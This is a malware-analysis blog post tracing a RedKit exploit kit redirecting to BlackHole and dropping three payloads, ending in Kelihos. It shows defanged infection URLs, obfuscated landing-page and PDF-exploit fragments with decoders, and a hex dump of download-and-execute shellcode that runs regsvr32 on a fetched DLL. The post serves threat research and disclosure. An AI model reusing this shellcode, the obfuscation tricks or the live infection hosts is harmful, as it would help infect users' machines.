What happens if the RedKit Exploit Kit teams up with BlackHole EK? = Triple payload + infection of Khelios!
30 Dec 2012. It is the last crusade of the year 2012, and this crusade was started from a RedKit lead. We heard that RedKit is going into heavy customization, so it is good for the new year's adventure as a "different" challenge than BHEK. Sadly, I am in hospital writing this, on duty waiting for my Dad to be transferred to another place, so I just depend on my Note PC to do this analysis; please bear with these initial results, I will add the binary analysis details after New Year. Unfortunately, this case is longer than I expected; indeed, it is good to kill my waiting time.
So here we go: the RedKit Exploit Kit to BHEK, triple payload downloads case, ending up with Khelios :-)
Infector URL:
h00p://optik-welter.de/hcwf.htm
Using Google as the referer plus IE/Java headers, we fetched it:
--17:58:21-- h00p://optik-welter.de/hcwf.htm
=> `hcwf.htm'
Resolving optik-welter.de... seconds 0.00, 82.165.104.24
Caching optik-welter.de => 82.165.104.24
Connecting to optik-welter.de|82.165.104.24|:80... seconds 0.00, connected.
GET /hcwf.htm HTTP/1.0
Referer: http://www.google.com/url?..
User-Agent: MalwareMustDie painted your front door *pink*
Accept: */*
Host: optik-welter.de
Connection: Keep-Alive
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Date: Sun, 30 Dec 2012 08:58:22 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Content-Length: 12996
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: text/html
---response end---
200 OK
17:58:23 (41.24 KB/s) - `hcwf.htm' saved [12996/12996]
Let's see the insides:
<html><body><td>Ydoanunan onontothmeiun we i de idedovoitthcode..
↑We see an old version of PluginDetect (0.7.7) modified for the evil purpose. In the PluginDetect script we can easily see some suspicious malware infector download URLs like:
ive="h00p://optik-welter・de/332.jar" code="Runs.class"><param n..
obapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f..
bapoprxkllobapopey5llobapoptrrllobapoplwallobapope5illobapopwg4..
apoptg9llobapoppmkllobapopo2tllobapop/lrllobapop/olllobapop:36l..
pophwlllobapop"></applet><applet archive="h00p://optik-welter.d..
ame="elitken" value="lv9llobapopm0kllobapopt0vllobapophczllobap..
gllobapopezlllobapopdi1llobapop.l8llobapoprp1llobapope3pllobapo..
llobapop-iallobapopkkdllobapopi3kllobapoptyillobapoppydllobapop..
lobapoppdallobapopt82llobapoptlcllobapophk5llobapop"></applet>..
var jsou = "src";
var cxhy=document.createElement("iframe");
function dettq()
{
document.body.appendChild(cxhy);
cxhy.setAttribute(jsou,"h00p://optik-welter・de/
}
var Ganni={version:"0.7.7",rDate:"04/11/2012",n..
eturn function(){c(b,a)}},isDefined:function(b){return typeof b ..
turn(/array/i).test(Object.prototype.toString.call(b))},isFunc:..
n"},isString:function(b){return typeof b=="string"},isNum:funct..
trNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},g..
egx:/[\.\_,-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)..
umRegx).exec(b):null;return a?a[0]:null},compareNums:function(h..
:
: (snipped)
:
Ganni.initScript();
flopp=Ganni.getVersion("AdobeReader");
if(flopp)
{
flopp=flopp.split(',');
if (((3+1) > flopp[1] && (8+1)==flopp[0]) || ((2+1) > flopp[1] && (7+1)==flopp[0]))
{
cxhy.setAttribute("width",4);
cxhy.setAttribute("height",12);
dettq();
}
}</script></body></html>
h00p://optik-welter.de/332.jar
h00p://optik-welter.de/887.jar
h00p://optik-welter.de/987.pdf
↑It is good to try to download these, go ahead and try, but I prefer to go straight to the payload. Note the gate in the script above: the PDF iframe (dettq()) is only injected when PluginDetect reports Adobe Reader with major version 9 and minor below 4, or major version 8 and minor below 3, i.e. only unpatched 8.x/9.x readers get the PDF.
The Sharing of RedKit EK Infector Source/Code
The complete landing page HTML code is pasted here -->>[PASTEBIN]
The PluginDetect 0.7.7 code is here -->>[PASTEBIN]
Guide to Crack the RedKit Landing Page Code (to fetch the 1st payload)
In the landing page there's the applet code that can lead us to the payload. The applet code below is one of the keys to fetch the payload:
<applet archive="h00p://optik-welter.de/332.jar" code="Runs.class">
Let's take the parameter elitken's value:
<param name="elitken" value="lrkllobapopm0illobapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f0llobapope8xllobapopdxqllobapop.hkllobapoprxkllobapopey5llobapoptrrllobapoplwallobapope5illobapopwg4llobapop-adllobapopkyyllobapopil8llobapoptg9llobapoppmkllobapopo2tllobapop/lrllobapop/olllobapop:36llobapoppx2llobapopt4gllobapoptgqllobapophwlllobapop">
</applet>
lrkllobapopm0illobapoptdellobapophh0llobapop.qvllobapop3ytllobapop3kzllobapop/f0
llobapope8xllobapopdxqllobapop.hkllobapoprxkllobapopey5llobapoptrrllobapoplwa
llobapope5illobapopwg4llobapop-adllobapopkyyllobapopil8llobapoptg9llobapoppmk
llobapopo2tllobapop/lrllobapop/olllobapop:36llobapoppx2llobapopt4gllobapoptgq
llobapophwlllobapop
You see the repetition of the "llobapop" string? It is actually a delimiter. So let's eliminate them, then we get the sets of garbled words below:
lrk m0i tde hh0 .qv 3yt 3kz /f0 e8x dxq .hk rxk ey5 trr lwa
e5i wg4 -ad kyy il8 tg9 pmk o2t /lr /ol :36 px2 t4g tgq hwl
To decode this, we noticed the simple trick: take the first character of each word and gather those first characters backward (last word first), and we get the download URL:
h00p://optik-welter.de/33.html
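As an added example (my own Python, not code from the post or from the RedKit kit), here is the decode trick above as a small script: it splits the elitken value on the "llobapop" delimiter, keeps the first character of each token, and reads them back to front. It goes a little beyond the single case by pulling every <param> out of an applet tag with a regex, since the landing page carries more than one applet. The function names and the URL sanity check are mine; the applet tag and parameter value are copied from the page.

```python
import re

# Added example, not code from the original post: decode the RedKit applet
# parameter shown above. Function and constant names are my own.
DELIM = "llobapop"   # the repeated junk string that separates the tokens

# elitken value copied verbatim from the applet tag quoted above; it is only
# split over several source lines for readability.
ELITKEN = (
    "lrkllobapopm0illobapoptdellobapophh0llobapop"
    ".qvllobapop3ytllobapop3kzllobapop/f0llobapop"
    "e8xllobapopdxqllobapop.hkllobapoprxkllobapop"
    "ey5llobapoptrrllobapoplwallobapope5illobapop"
    "wg4llobapop-adllobapopkyyllobapopil8llobapop"
    "tg9llobapoppmkllobapopo2tllobapop/lrllobapop"
    "/olllobapop:36llobapoppx2llobapopt4gllobapop"
    "tgqllobapophwlllobapop"
)

# The applet tag from the landing page, rebuilt around the value above.
SAMPLE_APPLET = (
    '<applet archive="h00p://optik-welter.de/332.jar" code="Runs.class">'
    f'<param name="elitken" value="{ELITKEN}"></applet>'
)

PARAM_RE = re.compile(r'<param\s+name="([^"]+)"\s+value="([^"]*)"', re.I)


def decode_redkit_param(value: str, delim: str = DELIM) -> str:
    """Split on the delimiter, keep the first character of every token and
    read those characters back to front: that is the hidden URL."""
    tokens = [t for t in value.split(delim) if t]   # drop the empty trailing token
    return "".join(t[0] for t in reversed(tokens))


def decode_applet_params(html: str, delim: str = DELIM) -> dict:
    """Decode every <param> value found in the HTML, keyed by parameter name."""
    return {name: decode_redkit_param(value, delim)
            for name, value in PARAM_RE.findall(html)}


def is_url(text: str) -> bool:
    """Cheap sanity check that a decoded value really is a download URL."""
    return re.fullmatch(r"https?://[\w.-]+/\S*", text) is not None


if __name__ == "__main__":
    for name, decoded in decode_applet_params(SAMPLE_APPLET).items():
        flag = "URL" if is_url(decoded) else "not a URL"
        print(f"{name}: {decoded}  [{flag}]")
```

Running it prints the same http://optik-welter.de/33.html that the manual walk-through arrives at; feed it the 887.jar applet's elitken value from the pastebin to get that applet's target the same way.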
Payload 1
The above URL is actually the payload's URL. 33.html is in fact a PHP script that feeds you the payload binary, setup.exe, as per the PoC below. Yes, it is a binary file (the MZ/PE header is right there in the dump), served under the name "setup.exe". I will do the binary analysis later, but after the dump let me explain what this malware does once executed on your system:
@unixfreaxjp /malware]$ myfetch h00p://optik-welter.de/33.html
--18:16:43-- h00p://optik-welter.de/33.html
=> `33.html'
Resolving optik-welter.de... seconds 0.00, 82.165.104.24
Caching optik-welter.de => 82.165.104.24
Connecting to optik-welter.de|82.165.104.24|:80... seconds 0.00, connected.
GET /33.html HTTP/1.0
Referer: h00p://www.google.com/..
User-Agent: #MalwareMustDie is hammering your door with nails.
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Host: optik-welter.de
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Date: Sun, 30 Dec 2012 09:16:44 GMT
Server: Apache
X-Powered-By: PHP/4.4.9
Expires: Mon, 20 Aug 2002 02:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
Content-Transfer-Encoding: binary
Content-Disposition: inline; filename=setup.exe
Content-Length: 41472
Keep-Alive: timeout=2, max=200
Connection: Keep-Alive
Content-Type: application/octet-stream
:
200 OK
18:16:46 (37.76 KB/s) - `33.html' saved [41472/41472]
@unixfreaxjp /malware]$ ls -alF 33.html
-rwxr--r-- 1 rik wheel 41472 Dec 30 18:16 33.html*
@unixfreaxjp /malware]$ mycheckbin ./33.html
0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ..............
0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@.......
0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................
0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th
0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno
0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS
0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$.......
0080 50 45 00 00 4C 01 07 00 5C 82 DF 50 00 00 00 00 PE..L......P....
: : :
snipped....snipped..
1. After injecting malicious code into another process:
0xdc setup.exe
0x348 svchost.exe
2. It tried connecting to the below malware domains:
a-wing.com.ar
girasoles-web.com.ar
hsd-transport.com
amcarlosbarrios.es
littleowlletterpress.com
beach-hotel-andalusia.com
jastreb.hr
gyneco-saint-andre.fr
aliyahraks.com
tvmarinaresort.com
3. Each connected domain is requested with an HTTP GET:
a-wing.com.ar GET /h.htm HTTP/1.1
girasoles-web.com.ar GET /g.htm HTTP/1.1
hsd-transport.com GET /g.htm HTTP/1.1
amcarlosbarrios.es GET /m.htm HTTP/1.1
littleowlletterpress.com GET /v.htm HTTP/1.1
beach-hotel-andalusia.com GET /x.htm HTTP/1.1
jastreb.hr GET /c.htm HTTP/1.1
gyneco-saint-andre.fr GET /y.htm HTTP/1.1
aliyahraks.com GET /u.htm HTTP/1.1
tvmarinaresort.com GET /o.htm HTTP/1.1
↑These requests are fired rapidly; on my machine I counted 22,000 requests within 90 seconds! Each one-letter .htm path is a redirector into the BHEK chain, as the 301 below shows.
4. Upon connecting you will be redirected to BHEK↓
After being redirected a few times, we arrive at wufjajcy.ru to fetch the 1.php file. This 1.php file is the BHEK landing page.
--20:26:56-- h00p://beach-hotel-andalusia.com/x.htm
=> `x.htm'
Resolving beach-hotel-andalusia.com... seconds 0.00, 213.175.208.2
Caching beach-hotel-andalusia.com => 213.175.208.2
Connecting to beach-hotel-andalusia.com|213.175.208.2|:80... seconds 0.00, connected.
:
GET /x.htm HTTP/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: beach-hotel-andalusia.com
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
HTTP request sent, awaiting response...
:
HTTP/1.1 301 Moved Permanently
Content-Length: 239
Content-Type: text/html
Location: h00p://linsubby.ru/count4.php
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 30 Dec 2012 11:27:02 GMT
Connection: close
:
301 Moved Permanently
Location: h00p://linsubby.ru/count4.php [following]
--20:26:57-- h00p://linsubby.ru/count4.php
=> `count4.php'
Resolving linsubby.ru... seconds 0.00, 31.207.231.141
Caching linsubby.ru => 31.207.231.141
Connecting to linsubby.ru|31.207.231.141|:80... seconds 0.00, connected.
:
GET /count4.php HTTP/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: linsubby.ru
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
HTTP request sent, awaiting response...
:
HTTP/1.1 302
Server: Apache
Content-Length: 0
Content-Type:
Last-Modified: Вс, 30 дек 2012 11:27:01 GMT   (Russian-locale "Sun, 30 Dec 2012"; CP1251 text that the capture rendered as CP437)
Accept-Ranges: bytes
Server:nginx/0.8.34
Date:Sun, 30 Dec 2012 11:26:59 GMT
X-Powered-By:PHP/5.3.2
Location:h00p://wufjajcy.ru/links/1.php
:
302
Location: h00p://wufjajcy.ru/links/1.php [following]
Closed fd 1896
--20:27:00-- h00p://wufjajcy.ru/links/1.php
=> `1.php'
Resolving wufjajcy.ru... seconds 0.00, 184.82.27.102
Caching wufjajcy.ru => 184.82.27.102
Connecting to wufjajcy.ru|184.82.27.102|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d6548 (new refcount 1).
:
GET /links/1.php HTTP/1.0
Referer: h00p://www.google.com/url?..
User-Agent: #MalwareMustDie is tired knocking so many doors..
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plai
n;q=0.8,image/png,*/*;q=0.5
Host: wufjajcy.ru
Connection: Keep-Alive
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 11:27:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.18
:
200 OK
Length: unspecified [text/html]
20:27:17 (6.67 KB/s) - `1.php' saved [92673]
The Sharing of BHEK Infector Resources/Code
The BHEK landing page HTML code is here--->>[PASTEBIN]
The decoded BHEK PluginDetect 0.7.9 is here -->>[PASTEBIN]
(Please read our previous post about BHEK for the guidance to decode)
The BHEK was weaponized ONLY for dropping the PDF, at the function p1:
function p1(){
var d = document.createElement("object");
d.setAttribute("data", "/links/1.php?dcdjf=" + x("c833f") + "&nybnj=" + x("cqk") +
"&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=" + x(pdfver.join(".")));
d.setAttribute("type", "application/pdf");
document.body.appendChild(d);}
As explained before, let's use THEIR function to crack their code (x() converts every character code to base 33 and joins the results with ":"):
function x(s){
d = [];
for (i = 0; i < s.length; i ++ ){
k = (s.charCodeAt(i)).toString(33);
d.push(k); } ; return d.join(":");}
var a=x("TYPE-THE-STRING-HERE");
document.write(a);
Which leads us to the download URL of:
/links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f
(vbpuhlu carries the Adobe Reader version string, here 5.0.1.0, which is why the server only hands out the PDF to a "vulnerable" reader.)
Wrap it with the BHEK domain name and download it:
URL: h00p://wufjajcy.ru/links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f
The downloaded file is actually a PDF file, containing evil JavaScript.
GET /links/1.php?dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f HTTP/1.0
Referer: http://www.google.com/url?..
User-Agent: I am speachless seeing how fool your codes are - #MalwareMustDie
Accept: */*
Host: wufjajcy.ru
Connection: Keep-Alive
:
HTTP request sent, awaiting response...
:
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 12:18:46 GMT
Content-Type: application/pdf
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Content-Length: 21419
ETag: "834215633845d4bc9d54eff04e9f149b"
Last-Modified: Sun, 30 Dec 2012 12:19:11 GMT
Accept-Ranges: bytes
:
200 OK
Registered socket 1896 for persistent reuse.
Length: 21,419 (21K) [application/pdf]
21:18:45 (9.04 KB/s) - `1.php@dcdjf' saved [21419/21419]
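As an added example (my own Python port, not the kit's code), here is the x() routine above together with its inverse, applied to the two query strings the page shows: the one p1() builds for the PDF and the one embedded at the end of the PDF shellcode (zegqqzh=…&cnw=1h&krac=kfxi&zago=mqsqjxwg, in the hex dump further down). Function names are mine; the decoder leaves values that are not base-33 token lists (krac, zago) untouched, so a mixed query string can be decoded in one pass.

```python
import string

# Added example, not the exploit kit's own code: Python port of BHEK's x()
# and its inverse. Function names are my own.
ALPHABET = string.digits + string.ascii_lowercase   # digit set of JS Number.toString(33)

# Query strings copied from the page: the PDF URL built by p1() and the URL
# embedded at the end of the PDF shellcode.
PDF_QUERY = ("dcdjf=30:1n:1i:1i:33&nybnj=30:3e:38"
             "&kve=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&vbpuhlu=1k:1d:1f:1d:1g:1d:1f")
SHELLCODE_QUERY = ("zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g"
                   "&cnw=1h&krac=kfxi&zago=mqsqjxwg")


def to_base(n: int, base: int) -> str:
    """Non-negative integer to a lowercase base-`base` string (JS toString(base))."""
    digits = []
    while True:
        n, r = divmod(n, base)
        digits.append(ALPHABET[r])
        if n == 0:
            return "".join(reversed(digits))


def x_encode(s: str) -> str:
    """BHEK's x(): the char code of every character in base 33, joined with ':'."""
    return ":".join(to_base(ord(c), 33) for c in s)


def x_decode(enc: str) -> str:
    """Inverse of x(). Raises ValueError when a token is not base 33 or the
    result is not printable ASCII, so plain (unencoded) values are not mangled."""
    chars = [chr(int(tok, 33)) for tok in enc.split(":")]
    if not all(32 <= ord(c) < 127 for c in chars):
        raise ValueError("not an x()-encoded string")
    return "".join(chars)


def decode_query(query: str) -> dict:
    """Decode each value of a BHEK query string where possible; values that
    are not x()-encoded (e.g. krac=kfxi) are passed through unchanged."""
    out = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        try:
            out[key] = x_decode(value)
        except ValueError:
            out[key] = value
    return out


if __name__ == "__main__":
    print(decode_query(PDF_QUERY))
    print(decode_query(SHELLCODE_QUERY))
    # Rebuilding p1()'s URL from plaintext gives back exactly what the page shows.
    print(f"/links/1.php?dcdjf={x_encode('c833f')}&nybnj={x_encode('cqk')}")
```

The decoded PDF query reads dcdjf=c833f, nybnj=cqk, kve=48767bd471 and vbpuhlu=5.0.1.0, and the shellcode query carries the same c833f and 48767bd471 values plus cnw=2, which is how you can tie the second-stage download back to the same BHEK session.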
That code is at 0x48D; I made GUIDE to crack & analyze it here--->>[PASTEBIN]
The PDF uses Adobe Reader exploit code for (1) Collab.getIcon, CVE-2009-0927, and (2) Collab.collectEmailInfo, CVE-2007-5659.
↑As stated in the guide, the exploit is used to execute the obfuscated shellcode string, which in hex can be viewed as below. The readable strings already tell the story: "urlmon" is loaded, the download is written as wpbt<digit>.dll, and it is executed with "regsvr32 -s", the classic BHEK download-and-execute shellcode:
66 83 e4 fc fc 85 e4 75 34 e9 5f 33 c0 64 8b 40 f......u4._3.d.@
30 8b 40 0c 8b 70 1c 56 8b 76 08 33 db 66 8b 5e 0.@..p.V.v.3.f.^
3c 03 74 33 2c 81 ee 15 10 ff ff b8 8b 40 30 c3 <.t3,........@0.
46 39 06 75 fb 87 34 24 85 e4 75 51 e9 eb 4c 51 F9.u..4$..uQ..LQ
56 8b 75 3c 8b 74 35 78 03 f5 56 8b 76 20 03 f5 V.u<.t5x..V.v...
33 c9 49 41 fc ad 03 c5 33 db 0f be 10 38 f2 74 3.IA....3....8.t
08 c1 cb 0d 03 da 40 eb f1 3b 1f 75 e6 5e 8b 5e ......@..;.u.^.^
24 03 dd 66 8b 0c 4b 8d 46 ec ff 54 24 0c 8b d8 $..f..K.F..T$...
03 dd 8b 04 8b 03 c5 ab 5e 59 c3 eb 53 ad 8b 68 ........^Y..S..h
20 80 7d 0c 33 74 03 96 eb f3 8b 68 08 8b f7 6a ..}.3t.....h...j
05 59 e8 98 ff ff ff e2 f9 e8 00 00 00 00 58 50 .Y............XP
6a 40 68 ff 00 00 00 50 83 c0 19 50 55 8b ec 8b j@h....P...PU...
5e 10 83 c3 05 ff e3 68 6f 6e 00 00 68 75 72 6c ^......hon..hurl
6d 54 ff 16 83 c4 08 8b e8 e8 61 ff ff ff eb 02 mT........a.....
eb 72 81 ec 04 01 00 00 8d 5c 24 0c c7 04 24 72 .r.......\$...$r
65 67 73 c7 44 24 04 76 72 33 32 c7 44 24 08 20 egs.D$.vr32.D$..
2d 73 20 53 68 f8 00 00 00 ff 56 0c 8b e8 33 c9 -s.Sh.....V...3.
51 c7 44 1d 00 77 70 62 74 c7 44 1d 05 2e 64 6c Q.D..wpbt.D...dl
6c c6 44 1d 09 00 59 8a c1 04 30 88 44 1d 04 41 l.D...Y...0.D..A
51 6a 00 6a 00 53 57 6a 00 ff 56 14 85 c0 75 16 Qj.j.SWj..V...u.
6a 00 53 ff 56 04 6a 00 83 eb 0c 53 ff 56 04 83 j.S.V.j....S.V..
c3 0c eb 02 eb 13 47 80 3f 00 75 fa 47 80 3f 00 ......G.?.u.G.?.
75 c4 6a 00 6a fe ff 56 08 e8 9c fe ff ff 8e 4e u.j.j..V.......N
0e ec 98 fe 8a 0e 89 6f 01 bd 33 ca 8a 5b 1b c6 .......o..3..[..
46 79 36 1a 2f 70 68 74 74 70 3a 2f 2f 77 75 66 Fy6./ph00p://wuf
6a 61 6a 63 79 2e 72 75 2f 6c 69 6e 6b 73 2f 31 jajcy.ru/links/1
2e 70 68 70 3f 7a 65 67 71 71 7a 68 3d 33 30 3a .php?zegqqzh=30:
31 6e 3a 31 69 3a 31 69 3a 33 33 26 75 77 75 63 1n:1i:1i:33&uwuc
3d 31 6a 3a 31 6e 3a 31 6d 3a 31 6c 3a 31 6d 3a =1j:1n:1m:1l:1m:
32 77 3a 33 31 3a 31 6a 3a 31 6d 3a 31 67 26 63 2w:31:1j:1m:1g&c
6e 77 3d 31 68 26 6b 72 61 63 3d 6b 66 78 69 26 nw=1h&krac=kfxi&
7a 61 67 6f 3d 6d 71 73 71 6a 78 77 67 00 00 00 zago=mqsqjxwg...
Payload 2
At the bottom of the hex dump you can see the payload URL :-) Let's fetch it:
URL: h00p://wufjajcy.ru/links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwg
GET /links/1.php?zegqqzh=30:1n:1i:1i:33&uwuc=1j:1n:1m:1l:1m:2w:31:1j:1m:1g&cnw=1h&krac=kfxi&zago=mqsqjxwg HTTP/1.0
Referer: http://www.google.com/url?..
User-Agent: MalwareMustDie is taking a break... running out of paint..
Accept: */*
Host: wufjajcy.ru
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 30 Dec 2012 13:11:48 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Pragma: public
Expires: Sun, 30 Dec 2012 13:12:19 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 23040
---response end---
200 OK
Length: 23,040 (23K) [application/x-msdownload]
100%[=================> ] 23,040 3.49K/s ETA 00:00
22:11:52 (3.49 KB/s) - `calc.exe' saved [23040/23040]
Another payload, calc.exe, so be it. This calc.exe self-deletes and copies itself to:
%System%\ntvdm.exe
It is run via CMD, starting these processes:
0x348 svchost.exe
0x420 svchost.exe
0x7e4 ntvdm.exe
0x7e4 ntvdm.exe
0x7e4 ntvdm.exe
It then requests connections to these random-looking domains:
cucaklif.ru
worgukiw.ru
oqivynle.ru
voxyqjyc.ru
qysriloh.ru
lymurufa.ru
ektizzab.ru
batycfac.ru
akmaxook.ru
nosgazim.ru
nopepkaq.ru
lofibvar.ru
lejbomor.ru
yficebnu.ru
tyjkexax.ru
:
(and maybe others, after getting some chance to analyze the binary)
The domain & IP info of the calc.exe download host:
wufjajcy.ru A 184.82.27.102
wufjajcy.ru NS ns1.larstor.com
wufjajcy.ru NS ns2.larstor.com
wufjajcy.ru NS ns3.larstor.com
wufjajcy.ru NS ns4.larstor.com
wufjajcy.ru NS ns5.larstor.com
wufjajcy.ru NS ns6.larstor.com
Payload 3
This calc.exe downloads another malware file, "newbos2.exe", via HTTP GET; the PoC fetch and a quick sandbox analysis follow:
--22:21:21-- h00p://cucaklif.ru/newbos2.exe
=> `newbos2.exe'
Resolving cucaklif.ru... seconds 0.00, 37.19.146.142
Caching cucaklif.ru => 37.19.146.142
Connecting to cucaklif.ru|37.19.146.142|:80... seconds 0.00, connected.
:
GET /newbos2.exe HTTP/1.0
Accept: */*
Host: cucaklif.ru
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 Ok
Server: Apache
Content-Length: 763904
Content-Type: application/octet-stream
Last-Modified: Вт, 01 янв 2002 02:16:15 GMT   (Russian-locale "Tue, 01 Jan 2002", again CP1251 rendered as CP437)
Accept-Ranges: bytes
200 Ok
Length: 763,904 (746K) [application/octet-stream]
100%[===================================> ] 763,904 7.06K/s ETA 00:00
22:31:13 (1.26 KB/s) - `newbos2.exe' saved [763904/763904]
// SELF-EXECUTED...
PId: 0x4ac
Image Name: C:\newbos2.exe
API:
CreateServiceA(hSCManager: 0x157048,
lpServiceName: "NPF",
lpDisplayName: "WinPcap Packet Driver (NPF)",
dwDesiredAccess: 0xf01ff,
dwServiceType: 0x1,
dwStartType: 0x3,
dwErrorControl: 0x1,
lpBinaryPathName: "system32\drivers\NPF.sys",
lpLoadOrderGroup: "(null)",
lpdwTagId: 0x0,
lpDependencies: 0x0,
lpServiceStartName: "(null)",
lpPassword: 0x0)
// REGISTRY...
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\SonyAgent
REG_SZ 38 "C:\newbos2.exe"
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ContextChangedCurrent
REG_SZ 138 "DMaWNZ4Ku1rL7IDJKR1RYFEEIRwBnxpmODxxvk5HaMX2C4K67X6Jyj7poL8MPRl87w=="
HKLM\System\CurrentControlSet\Services\NPF\DisplayName
REG_SZ 56 "WinPcap Packet Driver (NPF)"
LM\System\CurrentControlSet\Services\NPF\ImagePath
REG_EXPAND_SZ 50 "system32\drivers\NPF.sys"
//SOME DROPS....
C:\WINDOWS\system32\drivers\npf.sys
C:\WINDOWS\system32\Packet.dll
C:\WINDOWS\system32\wpcap.dll
//STARTING SERVICE: WinPcap Packet Driver (NPF) up...
CreateServiceA(hSCManager: 0x157048,
lpServiceName: "NPF",
lpDisplayName: "WinPcap Packet Driver (NPF)",
dwDesiredAccess: 0xf01ff,
dwServiceType: 0x1,
dwStartType: 0x3,
dwErrorControl: 0x1,
lpBinaryPathName: "system32\drivers\NPF.sys",
lpLoadOrderGroup: "(null)",
lpdwTagId: 0x0,
lpDependencies: 0x0,
lpServiceStartName: "(null)",
lpPassword: 0x0)
// SUSPICIOUS HTTP query (binary request bodies):
\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ez\xec\x85ez\xfc\x85ez-\x8bez\"\x8aez2\x8bez\x16z\xe4\x13?\xdfm\xbaC,\xf3\xe2d\x1e\xb1H\xffP\xb3\xf6\xec]\x0fd\x97\xdd\x85\x93W\xa2;Xo\x82\x11k\x05\x9b\xf1\xe7:|\xd3\xf98\x88\xc8\x8e\xfdf\x0f\xe2\xcbs\xf0\x07\xa31\x99\x1f\x9ee@\x01R\x91\x1d\xc80>t\xdf-L\xe6\x1d\xa2\x0f\x16z\xe4\x13?\xdfm\xbaC,\xf3\xe2d\x1e\xb1Hso\xc8\xe5\xb0\xc8A\x11\xc6L\xea\xb0\x04\x13\xa5\x83}^`8Dp\xcd
\x9e\x85ez\xc9\x85ez\xd9\x85ez
\x9e\x85ezg\x86ezw\x86ez\xa8\x8bez\x9d\x8aez\xad\x8bez\xad=P\xdf\tj\x86\xf7\x8b\x10>\x18BA\x9b\x90\xd5\xe3\xc0\xec\xb5_N\xb6\xe3\x92\vkL\x86\xb8\x02\xe3\x9dH\x1c\x88\x82<!b\x94E
